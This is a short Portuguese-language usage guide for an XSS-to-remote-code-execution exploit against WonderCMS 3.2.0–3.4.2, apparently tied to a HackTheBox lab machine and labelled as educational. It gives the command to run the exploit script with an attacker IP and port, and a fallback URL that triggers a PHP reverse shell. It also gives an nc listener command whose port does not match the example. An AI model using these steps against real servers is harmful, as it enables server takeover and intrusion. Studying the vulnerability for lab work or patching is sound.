
Injeção XSS, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 é vulnerável. Atacantes remotos podem assumir o controle total do servidor usando um exploit de Cross-Site Scripting (XSS) (Apenas para fins educacionais). Aqui está o plano:
O exploit abusa do componente installModule do WonderCMS para inserir um script malicioso que executa código arbitrário.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
Exemplo
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
Se a reverse shell não disparar automaticamente, vá para:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
Lembre-se de iniciar um listener usando o seguinte comando:
nc -lvp 4444
prodigiousMind por descobrir e relatar a vulnerabilidade https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413